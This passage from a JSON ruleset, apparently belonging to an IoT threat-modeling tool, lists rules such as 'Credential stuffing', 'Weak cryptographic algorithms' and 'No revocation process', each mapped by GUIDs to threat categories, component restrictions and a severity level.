level","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a4f10f42-4b29-4cbf-a849-0844b011609b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"56e4871b-bcb7-48f6-bd9e-5a8273d0b62c","Name":"Network access","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"3162421f-ca5b-400d-bbe8-58a510be9abf"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8fbc9cce-7d30-425a-ac50-c5ca44d206b0","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"d9290f90-aa79-432f-92e0-267226771aea","Name":"Outdated protocol","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"AttackVectorID":"04d5f07e-2482-451b-9e24-94cb650da53b"},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f7509951-f156-4774-89e9-1966b03ef03e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"961c5b9f-ea27-48ec-b526-514636536540","Name":"Weak cryptographic algorithms","Description":"Some Bluetooth versions use weak cryptographic algorithms","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c"},"overridenRuleIDs":[],"RuleType":4,"ProtocolRestriction":{"protocolID":"f805dd78-eac2-4967-8dfc-231605a75ace","DetailRestrictions":[]},"Severity":2},{"ID":"b76247eb-309c-4fad-9a8c-28fea0a98555","Name":"Exposure of personal information","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"dffbfc0a-850b-4de0-95fb-ab9ea4273d88","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"13649f62-1bd6-4b50-9646-a9df988262a5","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b9b2fbaa-be5c-48ca-bddc-6d4cb5989f96","Name":"Human injury","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"5deb66fa-ff3e-49b6-b0d2-66a39708d259","DetailRestrictions":[]},"Severity":3},{"ID":"7892b860-7ed4-4109-ae03-3c290271fef6","Name":"User unawareness of data collection","Description":"Personal information such as talks, coughs, etc. is exposed and processed by an external system","IsActive":true,"RuleGenerationType":3,"Mapping":{"AttackVectorID":"7742f998-ab1e-4f64-8ac6-12b3f97b936a","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":0,"NodeTypes":[{"TypeIDs":["4b7a61d0-c430-48ea-8730-03a81542a5d8"]},{"TypeIDs":[]}],"NodeRestrictions":[]},"Severity":2},{"ID":"ba71d0ae-0a71-40d5-a3e3-f15c3a3baa2b","Name":"Location Tracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["61d04f2d-83b1-4152-9aba-4ad188eef06d","2765e61e-29a9-498e-adf8-4d653f488e3d","5278c995-f9d9-410e-b012-2995ba30c353","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[]},"Severity":2},{"ID":"b05b7085-3952-4f0d-bb85-7c380eb32f92","Name":"Full-scale outage","Description":"A full-scale outage may cause the solution to be unavailable for its users. This may be caused by natural events but also by a malicious actor.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"0a168b12-fc9a-411c-bbf0-59599d0181f8","DetailRestrictions":[]},"Severity":3},{"ID":"8d604765-2981-4a70-9cb0-9569411503cc","Name":"Attackers may be undetected","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4a5bbdcf-ef9a-49cb-ac4c-a05dcefd95d2","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6e0c2499-9e6b-42da-8e9c-c34d40fca0db","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"2b0c94a0-f2c7-4068-86e4-2d5f7ed3fe94","Name":"Credential cracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"296e95fe-e06d-4ae3-be84-da98df4a122c","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":2},{"ID":"2c32278f-ea97-4aa1-8e85-982f76dee1b9","Name":"Credential stuffing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0217b20a-5e3a-4244-8dce-819e28050a47","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":3},{"ID":"a777fa41-a13f-4225-af47-e4458a0c8f9e","Name":"Password spraying","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1909127e-50bd-4892-8b1f-1a2123a4fa61","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":3},{"ID":"ab670c99-4f5c-41c7-974c-a6704df1661b","Name":"Unsecure default settings","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e060675a-41d0-4c4d-9e16-311bb4adec7b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"9ebe3a8f-eedb-40cd-9cbf-d1012a1829e2","DetailRestrictions":[]},"Severity":2},{"ID":"ab1d49fc-cb77-46cf-aeff-b4a28eb0d692","Name":"Undetected misuse of API","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b125fa52-c06e-4e54-88b5-5e9d3929f643","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"e014189e-5d3c-40c7-aac2-23202be3ccd4","Name":"Unsecure management access","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6962d897-bf88-4745-9f2c-a8aa9d981f93","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"a89ed38a-c36b-445b-a8c2-89e7289cdb9e","Name":"Message sniffing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59","Name":"Client spoofing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"de628891-642c-4b7c-b88b-abf7988721dc","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"2b82faea-2950-430d-8b52-273d9b0320e2","Name":"No privacy impact assessment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8f4a0dd3-2083-42eb-89bd-48480a082342","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"eaee9e9f-c3d7-42d7-9f8a-3d538cb9a17e","Name":"Outdated privacy impact assessment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3d756ae-7451-4738-986c-0e15d22cb2b2","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"03778e71-e9a1-4528-b1db-547990486b27","Name":"No safety impact assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a1e7923f-848d-4532-b967-700925af1a77","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"359293f9-3fe1-4b61-99cb-332809add1f5","Name":"No fault tree analysis","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"60b7ed0a-97b4-4904-a3bf-6d3ebdf01954","Name":"No account management","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"524e227d-483e-45ae-b002-3041d15fe7e9","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"65c95996-5153-4f47-a7cd-0ffe05f96309","Name":"Weak authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"330a4f44-1471-460d-889f-4f33a3b8ce72","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"23c52b69-1923-416b-99a4-620d36961365","Name":"Root privileges","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d0a3fe39-6894-44c5-91ec-1f1019ffda37","Name":"Certificates with long lifetime","Description":"Device certificates may be used without expiration. In this case, short-term operational certificates should be established.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"40c05808-37a1-4394-a9d5-8491b55c3a9b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"fdc27962-5622-47e7-8de8-ca1b60009276","Name":"No revocation process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"083e93ef-da95-4064-a698-6fbd5cf997f5","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"d0bd34ae-02d2-46e9-b45a-0130be9713c4","Name":"No management policy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"46d35b81-19e3-404e-9fe2-af5088971ffe","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"662c14ed-b7cf-490a-97b8-978836d022bb","Name":"No automated renewal process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0c0d40fd-7f0a-412d-ae80-efce58906308","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"2d55c643-21db-426a-be29-d21f7f1965a4","Name":"No incident response team","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"3c1166bd-b978-4361-9846-33cd050dd968","Name":"No supply chain risk management program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"42b3d570-e03c-440d-b7a4-87614c6b2e2c","Name":"Risks from third party components","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2614fc88-29cb-4d84-9902-5f7ca7f98410","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d54bae32-33ff-4b3a-b583-07b53b4c947b","Name":"No regular penetration tests","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d4cb3498-4689-49f2-9f37-8bd45e62a972","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"58d38f0f-82b4-4ecb-a95f-237adcfcb58c","Name":"Missing privacy measures","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cf9cef5a-3e4e-47cd-aa03-22522a1ce3e9","Name":"Privacy law compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ae2e4063-13cd-414e-811d-3d114365f85f","Name":"User rights and freedoms violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"db9dfe37-7599-4257-a425-e4948ffb8618","Name":"Insufficient user awareness","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4c2aaafd-3248-4b30-b011-cddef8e75876","Name":"Missing opt-in mechanism","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c68e523a-cba1-41b2-95ce-c8d634fd4396","Name":"Missing SDL program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a40575c4-b39f-4c9e-a4cb-3e15e3f27777","Name":"Missing responsibility for regulatory compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9db73879-4ec7-46ae-a8d9-1b555aac6954","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"8825c214-9562-4a85-8538-a0530d2b79ee","Name":"Missing responsibility for security compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"ef631565-02d7-4f52-a80b-e615224409df","Name":"Missing responsibility for auditing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"61c1d062-4c94-4af4-bd64-26a632462653","Name":"Missing testing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e6f155e1-51e1-4297-80d9-a6a3beef3657","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"ca3e9dda-cb0d-4f16-8b14-d0b11e4210cb","Name":"Missing trusted execution environment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f","ComparisonType":"==","Value":false}}]}},{"ID":"88d04fe9-ac62-4371-89d3-89471ac13027","Name":"Missing isolation of cryptographic operations","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"28c99516-8651-452e-86f7-ce00df632c8d","ComparisonType":"==","Value":false}}]}},{"ID":"d5c0c703-75c1-42dd-a0d0-ca114eb7cdb4","Name":"Decryption of recorded traffic","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"9c362082-55b7-4c48-ac28-e381f5f38a2d","Name":"No external audit","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"b634e0fe-6f3f-4c75-9df4-98f589d3a3f0","Name":"Missing employee training and awareness","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a05007e9-ca76-4584-a7be-47cf4a9625c4","Name":"No regular employee training","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"f424f4d3-b3c2-4718-8c5f-ec9b3b6eef74","Name":"No secure coding guidelines","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"60fadd09-661b-494a-bcac-f0a652172a50","ComparisonType":"==","Value":false}}]}},{"ID":"1a54b8f3-ecd6-4704-9f6c-e05b7e948548","Name":"Missing end of support 